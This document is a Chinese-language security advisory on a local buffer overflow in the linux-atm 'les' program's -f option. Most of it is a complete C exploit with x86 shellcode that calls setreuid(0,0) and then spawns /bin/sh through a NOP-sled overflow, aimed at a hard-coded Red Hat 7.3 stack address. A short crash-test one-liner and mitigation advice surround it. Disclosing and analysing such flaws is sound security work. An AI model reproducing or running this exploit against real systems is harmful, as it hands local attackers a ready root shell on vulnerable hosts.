
Linux-ATM LES命令行參數本地緩沖區溢出

涉及程序:
linux-atm les 2.4
 
描述:
Linux-ATM LES命令行參數本地緩沖區溢出
 
詳細:
Linux當前支持ATM,目前是實驗階段,支持RAW ATM連接、IP通過ATM、LAN模擬、MPOA等功能。

linux-atm 'les'可執行文件對命令行參數缺少正確的緩沖區邊界檢查,本地攻擊者可以利用這個漏洞進行緩沖區溢出攻擊,可能以root用戶權限在系統上執行任意指令。(能否取得root權限取決於les是否以提升的權限運行,例如被安裝為setuid root;本頁並未說明其安裝權限,請在受影響主機上自行核實。)

'/usr/local/sbin/les'程序對用戶提交給-f選項的數據缺少正確邊界檢查,提交超過252字節的數據可觸發緩沖區溢出,精心構建提交數據可能以root用戶權限在系統上執行任意指令。
 
 
攻擊方法:
Angelo Rosiello ([email protected])提供了如下測試方法:

/usr/local/sbin/les -f `perl -e 'print "A"x252'`

Angelo Rosiello([email protected]) 提供了如下測試程序:

/*
*** Exploit against the linux-atm project
***
*** http://sourceforge.net/projects/linux-atm
***************************************************************
*** VULNERABILITY
***
*** Stack Overflow discovered by Angelo Rosiello
*** /usr/local/sbin/les -f `perl -e 'print "A"x252'`
*** Program received signal SIGSEGV, Segmentation fault.
*** 0x41414141 in ?? ()
****************************************************************
*** AUTHOR: Angelo Rosiello
*** CONTACT: [email protected], [email protected]
*** [email protected]
***
*** Copyright (c) 2003 DTORS Security
*** All rights reserved.
*** http://dtors.net
***
*** SHELLCODE by esDee
***
*** 18/02/2003
***
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NOP 0x90 // x86 single-byte no-op; main() uses it as filler in front of the payload
#define LEN 252 // size in bytes of the argument main() builds for -f (the length quoted in the advisory)

void usage(); // defined at the end of the file; declared here without a parameter list

/*
 * Payload bytes, per the per-instruction annotations below: 32-bit x86 Linux
 * code that issues three int $0x80 system calls in sequence: setreuid(0,0),
 * execve of "/bin//sh", then exit.
 *
 * Reviewer note: the setreuid(0,0) step only yields root if the overflowed
 * process already holds root as its effective or saved uid. The root impact
 * claimed on this page therefore presupposes that les runs privileged, for
 * example installed setuid root (not stated on the page; confirm per host).
 */
static char shellcode[] =

 // setreuid(0,0);
 "\x31\xc0" // xor %eax,%eax
 "\x31\xdb" // xor %ebx,%ebx
 "\x31\xc9" // xor %ecx,%ecx
 "\xb0\x46" // mov $0x46,%al
 "\xcd\x80" // int $0x80

 // execve /bin/sh
 "\x31\xc0" // xor %eax,%eax
 "\x50" // push %eax
 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
 "\x89\xe3" // mov %esp,%ebx
 "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
 "\x50" // push %eax
 "\x53" // push %ebx
 "\x8d\x0c\x24" // lea (%esp,1),%ecx
 "\xb0\x0b" // mov $0xb,%al
 "\xcd\x80" // int $0x80

 // exit();
 "\x31\xc0" // xor %eax,%eax
 "\xb0\x01" // mov $0x1,%al
 "\xcd\x80"; // int $0x80

/*
 * Table of supported targets. main() indexes it with (selection - 1) and
 * usage() prints it.
 *
 * Reviewer note: each entry carries one fixed stack address for one
 * distribution release, so the listing depends on a predictable stack layout.
 * Stack address randomization invalidates a hard-coded value like this, and a
 * non-executable stack blocks a payload placed in the argument. Both are
 * general hardening measures and are not discussed on this page.
 */
struct
{
int number; // menu index shown by usage()
char *version; // human-readable label of the target system
long ret; // address main() writes repeatedly across the buffer
char path[256]; // path of the binary that main() passes to execl()
} target[] =
{
{1," Red Hat Linux release 7.3 (Valhalla)",
0xbffff860, "/usr/local/sbin/les"},
// Second entry is a placeholder: label " No defined" and an all-ones address.
{2," No defined", 0xffffffff , "/usr/local/sbin/les"},
};

/*
 * Entry point of the proof-of-concept for the les -f overflow described in
 * the advisory text. It picks a row of target[], builds a LEN-byte argument
 * in a local buffer, and replaces the current process with the target binary,
 * passing that buffer as the value of -f.
 *
 * Declared without a return type (implicit int) and never returns a value.
 * Control only falls off the end if execl() fails.
 */
main(int argc, char *argv[])
{
 char buffer[LEN];
 int i;
 long ret;
 char *PATH;
 int selection;
 // With no arguments at all, print the target list and exit with status 1.
 if(argc == 1)
 {
 usage((char **)argv[0]);
 exit(1);
 }
 // NOTE(review): only argc == 1 is ruled out above, and argv[1] is never
 // inspected (the usage text advertises "-t"). argv[2] is converted with
 // atoi() and the result is used as an index into target[] without a range
 // check.
 selection = atoi(argv[2]);

 printf("Ret = 0x%lx and PATH= %s\n", target[selection-1].ret, (char **)target[selection-1].path);
 printf("\nCopyright (c) 2003 DTORS Security\n");
 printf("ANGELO ROSIELLO 18/02/2003\n");
 printf("\tLES-EXPLOIT for Linux x86\n\n");

 ret = target[selection-1].ret;
 PATH = target[selection-1].path;
 // Fill the whole buffer with the selected address, one long-sized store
 // every 4 bytes (assumes a 4-byte long, consistent with the "Linux x86"
 // banner printed above).
 for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = ret;

 // Overwrite the first LEN - strlen(shellcode) - 25 bytes with NOP filler.
 for (i=0; i<(LEN-strlen(shellcode)-25);i++) *(buffer+i) = NOP;

 // Copy the payload directly after the filler; the final 25 bytes of the
 // buffer keep the address fill written by the first loop.
 memcpy(buffer+i,shellcode,strlen(shellcode));

 // Replace this process with the target binary: argv = "les", "-f", buffer.
 // Reviewer note: what a defender can observe is an exec of les whose -f
 // value is roughly LEN bytes of mostly non-printable data (long runs of
 // 0x90) instead of a file name. Process-execution auditing that records
 // arguments will capture this.
 execl(PATH, "les", "-f", buffer, NULL);
}

/*
 * Print the usage banner followed by one line per entry of target[].
 *
 * The earlier declaration is `void usage();` and main() calls this as
 * usage((char **)argv[0]), so the parameter actually holds the program-name
 * string pointer. `*(char **)&argv` reads that pointer value back, which is
 * why %s prints the program name.
 */
void usage(char *argv[])
{
 int i = 0;
 printf("\nUsage:\n%s -t [target number]\n\nTargets\n",*(char **)&argv);
 // NOTE(review): the loop stops at the first entry whose number is 0, but
 // target[] as defined in this file has no such terminating entry, so the
 // loop reads past the end of the array.
 while(target[i].number)
 {
 printf("[%d] %s \n", target[i].number, target[i].version);
 i++;
 }
}
 
 
解決方案:
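截至本公告發布時,廠商還沒有提供補丁或者升級程序。在取得修補版本之前,可檢查les是否帶有setuid/setgid位(例如 `ls -l /usr/local/sbin/les`),若無必要則移除該位,或僅允許受信任的用戶執行該程序。建議用戶隨時關注廠商的主頁以獲取最新版本: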

http://sourceforge.net/projects/linux-atm
 
附加信息:
